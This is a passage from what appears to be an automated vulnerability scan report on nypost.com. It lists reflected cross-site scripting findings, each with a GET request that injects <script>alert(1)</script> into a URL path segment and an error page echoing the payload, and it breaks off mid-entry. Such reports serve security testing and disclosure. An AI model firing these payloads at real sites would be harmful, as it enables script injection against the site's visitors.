Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:16 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig8bac9<script>alert(1)</script>42516a33a4b/WebPortal/nypost/blocks/search/search.js</p>
...[SNIP]...

1.476. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f2971<script>alert(1)</script>30a54286f8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortalf2971<script>alert(1)</script>30a54286f8d/nypost/blocks/search/search.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:18 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortalf2971<script>alert(1)</script>30a54286f8d/nypost/blocks/search/search.js</p>
...[SNIP]...

1.477. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e1143<script>alert(1)</script>c95256133a5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nyposte1143<script>alert(1)</script>c95256133a5/blocks/search/search.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nyposte1143<script>alert(1)</script>c95256133a5/blocks/search/search.js</p>
...[SNIP]...

1.478. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 656a0<script>alert(1)</script>f63b9bed0b7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks656a0<script>alert(1)</script>f63b9bed0b7/search/search.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks656a0<script>alert(1)</script>f63b9bed0b7/search/search.js</p>
...[SNIP]...

1.479. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8bb88<script>alert(1)</script>b7fbd52ec8e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/search8bb88<script>alert(1)</script>b7fbd52ec8e/search.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:24 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/search8bb88<script>alert(1)</script>b7fbd52ec8e/search.js</p>
...[SNIP]...

1.480. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/search/search.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/search/search.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 432cd<script>alert(1)</script>b84964f719b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/search/search.js432cd<script>alert(1)</script>b84964f719b HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 709
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/search/search.js432cd<script>alert(1)</script>b84964f719b</p>
...[SNIP]...

1.481. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd126<script>alert(1)</script>c1d984e9f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigcd126<script>alert(1)</script>c1d984e9f5/WebPortal/nypost/blocks/section_blocks/section_blocks.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 724
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigcd126<script>alert(1)</script>c1d984e9f5/WebPortal/nypost/blocks/section_blocks/section_blocks.js</p>
...[SNIP]...

1.482. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fc07e<script>alert(1)</script>18b26adf38f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortalfc07e<script>alert(1)</script>18b26adf38f/nypost/blocks/section_blocks/section_blocks.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:23 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortalfc07e<script>alert(1)</script>18b26adf38f/nypost/blocks/section_blocks/section_blocks.js</p>
...[SNIP]...

1.483. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a4a5d<script>alert(1)</script>36fedfc3c24 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nyposta4a5d<script>alert(1)</script>36fedfc3c24/blocks/section_blocks/section_blocks.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:25 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nyposta4a5d<script>alert(1)</script>36fedfc3c24/blocks/section_blocks/section_blocks.js</p>
...[SNIP]...

1.484. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6fea0<script>alert(1)</script>053db7657fd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks6fea0<script>alert(1)</script>053db7657fd/section_blocks/section_blocks.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:29 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks6fea0<script>alert(1)</script>053db7657fd/section_blocks/section_blocks.js</p>
...[SNIP]...

1.485. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 9506a<script>alert(1)</script>1868b0311c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/section_blocks9506a<script>alert(1)</script>1868b0311c/section_blocks.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 724
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:31 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/section_blocks9506a<script>alert(1)</script>1868b0311c/section_blocks.js</p>
...[SNIP]...

1.486. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f8d2f<script>alert(1)</script>822b267aa84 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.jsf8d2f<script>alert(1)</script>822b267aa84 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.jsf8d2f<script>alert(1)</script>822b267aa84</p>
...[SNIP]...

1.487. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8dcf5<script>alert(1)</script>3009b031cc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig8dcf5<script>alert(1)</script>3009b031cc8/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:23 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig8dcf5<script>alert(1)</script>3009b031cc8/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html</p>
...[SNIP]...

1.488. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1dd24<script>alert(1)</script>9fc9fbf97a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal1dd24<script>alert(1)</script>9fc9fbf97a/nypost/blocks/shareit/fbconnect/xd_receiver.html HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 726
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:25 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal1dd24<script>alert(1)</script>9fc9fbf97a/nypost/blocks/shareit/fbconnect/xd_receiver.html</p>
...[SNIP]...

1.489. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9b3b<script>alert(1)</script>ff7b2a843e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostc9b3b<script>alert(1)</script>ff7b2a843e5/blocks/shareit/fbconnect/xd_receiver.html HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:29 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostc9b3b<script>alert(1)</script>ff7b2a843e5/blocks/shareit/fbconnect/xd_receiver.html</p>
...[SNIP]...

1.490. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload de78f<script>alert(1)</script>abb6665de95 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksde78f<script>alert(1)</script>abb6665de95/shareit/fbconnect/xd_receiver.html HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:31 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksde78f<script>alert(1)</script>abb6665de95/shareit/fbconnect/xd_receiver.html</p>
...[SNIP]...

1.491. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c2734<script>alert(1)</script>28a1b25e7ac was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/shareitc2734<script>alert(1)</script>28a1b25e7ac/fbconnect/xd_receiver.html HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/shareitc2734<script>alert(1)</script>28a1b25e7ac/fbconnect/xd_receiver.html</p>
...[SNIP]...

1.492. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 77bb5<script>alert(1)</script>08c06ec80ce was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect77bb5<script>alert(1)</script>08c06ec80ce/xd_receiver.html HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect77bb5<script>alert(1)</script>08c06ec80ce/xd_receiver.html</p>
...[SNIP]...

1.493. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload 3a3f2<script>alert(1)</script>f91f8110b0b was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

